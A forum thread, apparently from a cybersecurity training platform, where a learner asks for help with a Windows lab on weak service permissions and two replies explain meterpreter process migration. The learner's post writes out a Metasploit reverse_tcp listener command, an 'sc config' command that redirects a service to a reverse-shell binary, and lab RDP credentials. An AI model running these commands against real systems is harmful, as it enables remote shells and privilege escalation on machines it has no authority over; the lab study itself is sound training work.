Forum Discussion
Bronze IIPrivilege Escalation: Windows – Weak Service Permissions
Could someone please explain the steps to be performed in last part of the lab?.
Where should I run "migrate -N LogonUI.exe"? It fails in windows and kali.
- msfconsole -q -x "use multi/handler; set payload windows/x64/meterpreter/reverse_tcp; set lhost 10.102.60.159; set lport 4444; exploit"
sc config DeleteFiles binpath="C:\Temp\reverse.exe"
sc qc DeleteFiles shows the path is "C:\Temp\reverse.exe"
Restart windows, but windows doesn´t really restars with "right click" on "windows logo" "Shut Down or Sign out" and I execute again:
xfreerdp /v:10.102.158.164 /u:Levi /p:Abc123 /dynamic-resolution
migrate -N LogonUI.exe, where and after which steps?
when restarting windows this is the mesage but it doesn´t restart [21:07:26:552] [64590:64591] [ERROR][com.freerdp.core] - rdp_set_error_info:freerdp_set_last_error_ex ERRINFO_LOGOFF_BY_USER [0x0001000C]
Regards.
2 Replies
- autom8on
Bronze III
Not sure whether this was solved - doesn't seem to have been? Though Al13nz hint is certainly pointing in the right direction. You do the migrate in meterpreter after compromising the remote box with metasploit. You need to be quick though...
Al13nzHi posewadone23 the migrate command is intended to be used within the meterpreter session that spawns from the listener you've got running on Metasploit. The windows service you exploit is unstable so once you have spawned your meterpreter shell you migrate to a more stable process, i.e. LogonUI.exe, to keep your session alive - you use this meterpreter session to complete the lab. There's a collection of labs you can do called "Introduction to Metasploit" that probably explains this better than I have though.
